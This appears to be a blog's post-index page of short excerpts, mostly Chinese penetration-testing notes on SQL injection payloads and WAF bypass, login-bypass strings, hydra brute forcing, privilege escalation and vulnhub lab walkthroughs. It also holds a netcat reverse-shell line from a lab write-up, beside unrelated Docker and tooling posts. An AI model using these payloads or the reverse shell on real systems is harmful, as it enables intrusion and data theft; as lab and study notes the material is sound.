- 博客(37)
- 收藏
- 关注
原创 简单说下堆叠注入概念,以及原理
区别就在于 union 或者union all执行的语句类型是有限的,可以用来执行的是查询语句,而堆叠注入可以执行的是任意的语句。服务器端生成的sql语句为:(因未对输入的参数进行过滤)Select * from products where productid=1;堆叠注入为攻击者提供了很多的攻击手段, 通过添加一个新的查询或者终止查询(;堆叠注入的局限性在于并不是每一个环境下都可以执行,可能受到API或者数据库引擎不支持的限制,当然了权限不足也可以解释为什么攻击者无法修改数据或者调用一些程序。
2024-04-02 15:28:06 251
原创 sql注入详解
username=1 and sleep (if((mid((select table_name from information_schema.tables where table_schema=database() limit 0,1)1,1)='c'),1,2)) --+&password=123(就是把爆database是什么的语句换成那个了查询表名的语句)。当然现在不用老方法来判断了,现在可以用数字型(整形):id=1/1 1/0 id=2-1 id=2-2。
2024-04-01 18:46:26 788 2
原创 docker命令详解大全
容器的7种状态:created(已创建)、restarting(重启中)、running(运行中)、removing(迁移中)、paused(暂停)、exited(停止)、dead(死亡)。容器生命周期管理命令、容器操作命令、容器rootfs命令、镜像仓库命令、本地镜像管理命令和基础版本信息命令。# 从镜像归档文件my_ubuntu_v3.tar创建镜像,命名为runoob/ubuntu:v4。# 将镜像ubuntu:15.10标记为 runoob/ubuntu:v3 镜像。
2024-03-31 21:44:09 681
原创 sqllabs1-7sql注入
id=1' union select updatexml(1,concat('~',(select table_name from information_schema.tables where table_schema='security' limit 0,1),'~'),3) --+查看数据库中的表:?
2024-03-24 15:36:27 495
原创 shentou思路流程
windows内核溢出提权,数据库提权、组策略首选项提取、web中间件提权、dll劫持提权、第三方软件/服务提权。3、服务器操作系统类型、版本、补丁状况、开放端口:22 ssh 80 web 445 3389.。linux内核漏洞提权、劫持高权限程序提权、sudoer配置文件错误提权。4、web中间件类型、版本、网站目录结构、使用的waf等设备。是否存在漏洞,是否可以拿到webshell或者其他权限。1、获取域名whois信息也就是所谓的资产收集。2、服务器子域名、旁站、c段查询。5、数据库类型、版本。
2024-03-22 09:40:19 681
原创 浅谈业务逻辑漏洞
是的,你没看错,短信炸弹严格意义上来讲也属于业务逻辑漏洞,诱发原因是没有进行时间戳等校验,此处与信息安全描述的重放攻击类似,在测试过程中,某接口存在发送手机验证码的功能,但是短信发送平台没有去识别该用户发送验证码的时间等,导致短时间内可以重复的发送大量的短信校验码,不但对系统资源进行了消耗,同时也对用户造成了恶劣的影响。在开发者的程序里,我看到用户的权限分为很多等级,简单举个例子一个公司每个部门都有一个管理员账号,即便是管理员,也分为10个等级,那么不同等级的管理员之间的越权行为还能是水平越权吗?
2024-03-21 19:02:29 599
原创 ZoonEye(钟馗之眼)
基本使用:hostname:搜索指定主机域名比如:hostname:baidu.com。port:搜索指定端口服务:port:80/8081/443/21/23等。cidr:搜索指定服务类型格式:cidr:192.168.1.1/24。City:搜索指定城市:City:Beijing/shanghai。country:搜索指定的国家:country:China。os:搜索指定的操作系统:os:windows/linux。service:搜索指定服务类型:service:http。
2024-03-15 16:22:16 479
原创 测试常见后门webshell管理工具
者三款webshell管理工具特点如下所示:1.菜刀:属于比较原始的插件,功能比较单一,使用比较简单,目前没有提供插件,也不支持扩展,目前也已经停止更新,传输方式是单项加密传输。此外,菜刀的问题在于只能够处理eval()函数,而无法处理assert()等函数。2.蚁剑:是一款还处于更新状态的工具,存在插件仓库,扩展性强,采取的数据传输方式是单向加密传输。蚁剑与菜刀相比支持编码和解码功能。3.冰蝎:目前也处于更新状态,但是不支持插件,采取的数据传输方式是双向加密传输,可以联动MSF。
2024-03-15 16:05:38 442
原创 了解php,java反序列化
七、 __isset(),当对不可访问属性调用isset()或empty()时调用 //在不可访问的属性上调用isset ()或empty ()触发。四、 __callStatic(),用静态方式中调用一个不可访问方法时调用 //在静态上下文中调用不可访问的方法时触发.三、 __call(),在对象中调用一个不可访问方法时调用 //在对象 上下文中调用不可访问的方法时触发.十二、 __invoke(),调用函数的方式调用一个对象时的回应方法 //当脚本尝试将对象调用为函数时触发。
2024-03-09 13:11:47 551
原创 sql注入堆叠查询+绕waf
id=-1 /**&id=-1%20union%20select%201,2,3%23*/1.堆叠查询注入:多条sql语句一起执行(stacked injection )比如:select * from user where id=1;safedog:修改提交方式,数据绕过,结合联想比如:/**/ %0a(换行)%23(#注释) #20(空格)?当然有局限性,随着数据库的不同,堆叠注入执行的也不一样。3.无敌fuzz,数据库特性,垃圾数据溢出,http参数污染。
2024-02-24 19:33:46 445 1
原创 sql注入
(3) 延时注入:可以利用if (条件,5,0),这里就是条件成立延迟五秒,不成立直接返回例:id =1 and if(database,5,0)也可以用id=1 or 1=1, id=1 or 1=2,不过现在网站基本都过滤点这些简单的了所以我们可以用。id=1/1,回显正常,id=1/0回显报错or id=2-1正常,id=2-2报错。(1)整型注入 :id=1 and 1=1,回显正常,1 and 1=2,回显不正常。sleep(5):id=1 and sleep(5)sql语句延迟五秒。
2024-02-19 11:34:53 353
原创 FOFA基使
5.city="beijing"&&port="8090"#指搜索在北京关于开放的端口8090的服务器。7.server=="Microsoft-llS/7.5"#搜索IIS7.5的服务器。1.ip="1.1.1.1"#从ip中搜索包含1.1.1.1的网站,ip作为名称。3.domain="qq.com"#搜索根域名带有qq.com的网站。6.app="phpMyadmin"#搜索phpmyadmin的设备。4.city="beijing"#搜索指定城市的资产。
2023-12-30 12:41:10 390
原创 msfconsole常用基本命令
命令:setg function以全局方式设置特定的配置参数(EG:设置本地或远程主机参数)。命令: show exploit 列出metasploit框架中的所有渗透攻击模块。命令:search name查找metasploit框架中所有的渗透攻击和其他模块。命令:set function设置特定的配置参数(EG:设置本地或远程主机参数)。命令:show options列出某个渗透攻击或模块中所有的配置参数。命令:show targets列出渗透攻击所有支持的目标平台。
2023-12-20 17:27:32 834
原创 了解操作系统漏洞
某个程序(包括操作系统)在设计时未被考虑周全,则这个缺陷或错误将可能被不法分子或黑客利用,通过植入木马病毒等方式来攻击或控制整个计算机,从而窃取计算机中的重要资料和信息,甚至破坏系统。系统漏洞发现的意义在于保护软、硬件设备以及网络的安全。3. 跨站请求伪造(CSRF):CSRF攻击可以利用用户在其他网站上的身份验证信息,以受害者的名义执行未经授权的操作,可能导致用户账户被盗、数据被篡改等。2. 加强安全防护:根据漏洞的特点,我们可以加强系统的安全防护措施,例如配置防火墙、加密通信、限制访问权限等。
2023-12-20 17:23:36 508
原创 JAVA反序列化
1.利用反序列化漏洞将程序运行的对象以二进制形式储存在文件系统中,在另一个程序中对序列化后的对象状态数据,进行反序列化恢复对象,可以实现多平台通信,对象持久化存储。位置:java .io.Object Output Stream java.io.Object Input stream。白盒测试又分为(函数点)Object Input stream.read Object。反序列化:Object Input stream --> read Object()3.检测可以分为黑盒检测和白盒检测。
2023-12-20 13:49:03 452
原创 PHP反序列化
技术分为:有类(class):触发魔术方法(-construct,-destruct,-wake up,-tostring)原理:未对用户输入的序列化字符串进行检测,导致攻击者可以进行反序列化过程,从而导致后代码执行。无类class序列化例子o:4:”info”:2{s:4:”name”:i:2:10”;_isset()在不可访问的属性调用isset()或者empty()触发。_unset()在不可访问属性使用unset()触发。反序列化:(将字符串还原成对象)序列化:(将对象转换成字符串)
2023-12-19 14:09:47 386
原创 新手必知必会(src)
路径扫描:对开放的web端口进行路径扫描,获取更多信息资产(御剑,dir_scanner,Websuite,dirsearch)在通过端口扫描、目录爆破、路径扫描之后,仍无法发现目标站点有效资产的时候,借助搜索引擎往往会有意外的收获。旁站c段查询:(phpinfo.me,www.webscan.cc,www.5kik.com)子域名爆破查询:(sublist3r,子域名挖掘机,fofa)如果这些方法都失效了就去构造接口,构造文件,目录,框架。检查页面,接口泄露,请求方式以及参数泄露。
2023-12-18 17:12:36 340
原创 vlunhub靶场,kali扫不到靶机解决方法
2.按键盘 “i” 进入编辑模式修改网卡名称,将enp0s3全部修改为ens33,如果没反应就多试几次。在下图这个界面将 ro quiet 改为 rw single init=/bin/bash.在靶机开机或者重启界面会出现下图界面,可以按shift然后按e就可以进入编辑。输入ip a查看本地网卡名称,本机网络网卡名称为ens33 命令:ip a。修改完成后按 ctrl+x 进入编辑。3.修改完成后按键盘 “esc”退出编辑模式。按e后就会进入下图界面。
2023-12-15 16:28:46 748
原创 全网dc系列dc-2最详解之一
进去之后我们可以看到网站由WordPress搭建的,可以知道7744的端口还能知道使用的协议是ssh意味着可以远程连接,右下角有一个flag可以点进去看看,接下来可以用kali自带的扫描工具Wpscan,可以利用一下命令:wpscan --url dc-2 -e u,可以得到三个用户名,5.这里可以利用wpscan --url dc-2-U qw.txt -P pds.txt爆破一下口令,看到了账户密码。这里-A:选定用于使用进攻性方式扫描,-p-端口扫描。之后我们打开火狐访问一下80端口的信息,
2023-12-12 14:54:13 1834
原创 初识防火墙
1.2应用层防火墙:也叫代理服务器,为服务请求提供代理,主要的不足是:为特定的协议而设定,不能够重新配置为对抗其他协议的攻击。1.4混合型防火墙:混合了其他的防火墙,既可以包含包过滤防火墙过滤所有可以接受的请求,把请求服务传送给代理服务器,再向Web服务器请求服务。1.3MAC层防火墙根据特定的主机身份进行过滤,而特定的主机身份用其MAC或网络接口NIC来表示。一.防火墙的处理模式:包过滤防火墙,应用网关,电路网关,MAC层以及混合模式这五钟处理模式。包过滤防火墙还有子类:静态过滤,动态过滤,状态包检查。
2023-10-15 11:43:32 76 1
原创 pycharm使用教程
我们来运行这段代码,这里发现三个绿色三角形符号,我们都可以点击,但这三个符号有一点区别,这里不方便演示,在python基础视频教程中我们会挨个演示一下区别,这里你只要知道最好选择右键下面的绿色三角形符号跑起代码就好了。4.如果创建文件直接点击下图箭头所指的Python file,如果是创建子目录可以选择下图中的1或者2,这两个的区别是1是普通目录,2是带包的目录,可以被直接import。3.点击Create开始创建,这样我们不仅新建了一个项目目录,同时也配置好了开发环境。
2023-10-06 09:50:13 322 1
原创 CSV转换为excel形式
n\nCSV文件与Excel文件的区别在于,Excel文件可以同时存储多个工作表,而CSV文件只能存储一个工作表。\n\n\n要将CSV文件转换为Excel文件,有两种方式,一种是利用客汇宝APP的CSV转xls功能进行转换。在“文件”菜单中,选择“打开”,在“文件类型”框中选择“所有文件”,然后导航到CSV文件所在的文件夹,选择该文件进行打开。现在,您可以在“文件”菜单中选择“另存为”,将文件保存为Excel文件。\n\n最后,您可以使用Excel文件进行数据分析,并创建出视觉上有吸引力的图表。
2023-10-04 23:53:24 1258 1
原创 渗透之信息收集(二)
这里我们找18年这个最新的漏洞。命令:hydra -l flag4 -P /usr/share/wordlist/rockyou.txt.gz ssh://192.168.121.129。打开加密脚本cat/var/www/scripts/password-hash.sh。找到了flag2,这里我们先不管他 但收获了数据库还有账号密码,可以简单看一下。脚本使用php写的这里还可以用php加参数,我们简单设置一下密码123456。这里知道了是cms,可以从cms入手,查一下durpal漏洞,有漏洞框架。
2023-09-29 13:25:43 84
原创 渗透之信息收集(一)
先简单信息收集探测一下目标ip地址,可以先用arp-scan -L,此命令可以探测一下当前网段的所有IP。20,80端口是突破口,80是HTTP协议,我们可以用浏览器简单看下。现在我们看一下靶机的mac,根据mac地址来判断哪个是靶机ip。再用namp -sP 192.168.120.0/24。可以确定DC的IP为192.168.120.128。之后看一下kali的ip,ifconfig。
2023-09-26 13:23:20 86 1
原创 DC靶场安装流程(1)
提示导入失败,不过没有关系点重试就好,导入完成后,打开DC-1虚拟机并等待,过程中别点进虚拟机里面。虚拟机配置把kali和靶机都设置成nat或者桥接都可以,一定要相同不然等下找不到ip网段什么的。显示这个页面就表示成功了。
2023-09-24 15:34:12 119 1
原创 渗透测试基本流程以及nmap基本命令
信息收集可以从编写报告信息收集可以从系统版本信息,应用信息,服务信息,以及相关防护信息方面入手。靶机ip nmap-sP 192.168.1.0/24或者ifconfig。扫描常见端口 nmap -p+192.168.1.0/24。判断操作系统 nmap-O 192.168.1.0/24。服务版本 nmap -sV 192.168.1.0/24。综合判断 nmap -A 192.168.1.0/24。nmap基本命令:端口扫描。
2023-09-17 19:31:23 88 1
原创 初步了解漏洞扫描
使用漏洞扫描软件可以帮助组织及时发现并修复系统中的安全漏洞,减少被黑客攻击的风险。然而,需要注意的是,漏洞扫描软件只能检测已知的漏洞,无法保证系统的绝对安全。漏洞扫描软件通常会使用已知的漏洞数据库和漏洞签名来进行扫描。它们可以检测出各种类型的漏洞,包括操作系统漏洞、应用程序漏洞、配置错误、弱密码等。一些漏洞扫描软件还可以进行自动化的漏洞利用尝试,以验证漏洞的可利用性。它通过扫描目标系统,识别潜在的漏洞,并提供相应的报告和建议,以帮助管理员修复这些漏洞,提高系统的安全性。
2023-09-14 13:02:59 76 1
原创 Windows系统溢出漏洞分析基础1
在程序设计中,栈通常是指一种后进先出(Last In First Out,LIFO)的数据结构,而入栈(Push)和出栈(Pop)则是进行栈操作的两种常见方法。栈底指针指向先入栈的数据,栈顶和栈底之间的空间存储的就是当前栈中的数据。缓冲区溢出漏洞就是向缓冲区写入数据时,由于没有做边界检查,导致了写入缓冲区的数据都超过了预先分配的边界,从而使溢出的数据覆盖在和大数据上,而引起得系统异常。1)前一个栈帧的栈底位置,即前栈帧EBP,用于在函数调用结束后恢复主调函数的栈帧(前栈帧的栈顶可计算得到)。
2023-09-11 13:59:03 90
原创 了解B\S
B/S (Browser/Server,浏览器/服务器)模式又称B/S结构。它是随着Intern et技术的兴起,对C/S模式应用的扩展。B/S模式最大的好处是运行维护比较简便,能实现不同的人员,从不同的地点,以不同的接入方式(比如LAN,WAN,Internet/Intranet等)访问和操作共同的数据;(3)、维护简单方便,只需要改变网页,即可实现所有用户的同步更新.(2)、操作是以鼠标为最基本的操作方式,无法满足快速操作的要求。(4)、无法实现分页显示,给数据库访问造成较大的压力。
2023-09-10 19:41:57 1019 1
原创 Docker入门理解2
6.Docker特性。日志记录:Docker将收集到和记录的每个进程容器的标准流(stdout/stderr/stdin),用于实时检索或者批量检索变更管理:容器文件系统的变更可以提交到新的镜像中,并可重复使用以创建更多的容器。交互式shell:Docker可以分配一个虚拟终端并且关联到任何容器的标准输出上,例如运行一个一次性交互shell。一个容器的镜像通常都很小,不用和存储大量数据,存储可以通过外部挂载等方式使用,比如:NFS、ipsan、MFS等 ,或者docker命令 ,-v映射磁盘分区。
2023-09-07 08:13:22 56 1
原创 网络爬虫基本原理
首先精心选择一些URL,把这些精心选择的URL放入URL队列中,从对列中捉取代取的URL读取URL之后开始解析DNS,把这些URL下载下来放入网页库中。最常用的方法是确定抓取URL书费你随路的存储格式,写一个自动化程序向网络服务器请求数据,而后对数据进行解析,汲取需要的信息并存入数据库。其理论上网页抓取是一种经过由多种方法手机网络的数据方式,不仅是有与API交互的方式。基本流程就是:发送请求-获取响应内容-解析内容-保存数据。常见的叫法是网页抓屏,数据挖掘,网络收割,从网络爬虫的角度可以把互联网分为五种。
2023-09-05 20:34:00 912
原创 介绍 Docker 的基本概念和优势,以及在应用程序开发中的实际应用。
容器:Docker的核心技术,容器是将应用程序及其依赖项打包到一个轻量级、独立的运行环境中的一种技术。镜像:容器的基础是镜像。持续集成/持续交付(CI/CD)管道:Docker可以作为部署管道中的一部分,帮助开发人员在不同的环境中构建、测试和部署应用程序。便于迁移:Docker的容器化架构可以帮助开发人员将应用程序轻松地从一个环境迁移到另一个环境,从而实现无缝的部署和升级。云原生应用程序:Docker可以作为云原生应用程序的基础,帮助开发人员在云环境中实现弹性扩展、快速部署和高可用性。
2023-09-05 13:33:17 51
原创 虚拟机的安装以及win7镜像和配置
3.这里我们选择第二链接个因为大家现在基本上都可以用x64版本的,他这个的意思是这个win7是旗舰版本而且是打了补丁的方便大家以后再虚拟级是真实机中传文件。当然第一个也推荐因为他发布的时间在19年肯定比11年的做的更加完善,在这里再说下要复制(BT)的哦,因为ED2k不支持百度网盘解压下载,当然有想下载ED2k的可以放在迅雷中,那里可以解压下载。当然虚拟机还有其它版本可以在i tell you寻找,在图2中有各种版本有专业版,家庭版等等看各自的需求吧。以上就是虚拟机的安装,以及win7镜像安装以及配置。
2023-09-05 13:27:49 711 3
原创 菜刀使用教程
第一步:首页空白处右键,点击添加\n\n第二步:复制网站shell地址后粘贴此处,并填写webshell密码。相关一句马\n\n\u003C?\n\nwebshell分别为:key,ab12,123。第四步选择添加的站点右键,选择模式。
2023-08-26 15:25:47 139
原创 kali暴打bob
之后login.txt.gpg是一个加密文件打开他需要密钥,进行目录翻找cd Secret keepout Not_Porn No_lookie_In_Here$./note sh,之后推测一下可能是藏头诗。之后切换用户 su jc尝试解密gpg --batch --passphrase HARPOCERATES -d lodin.txt.gpg。首先在bp那里输入/bin/nc -e/bin/bash 192.168.xx.xxx 9999(这里监听的是kali的ip)
2023-08-24 21:22:55 67 1
原创 sql注入万能密钥
16: 用户名 ’ UNION Select 1,1,1 FROM admin Where ”=’ (替换表名admin)17..admin' or 'a'='a 密码随便。admin’ or ‘a’=’a 密码随便。asp aspx万能密钥。
2023-08-24 21:21:50 595 1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人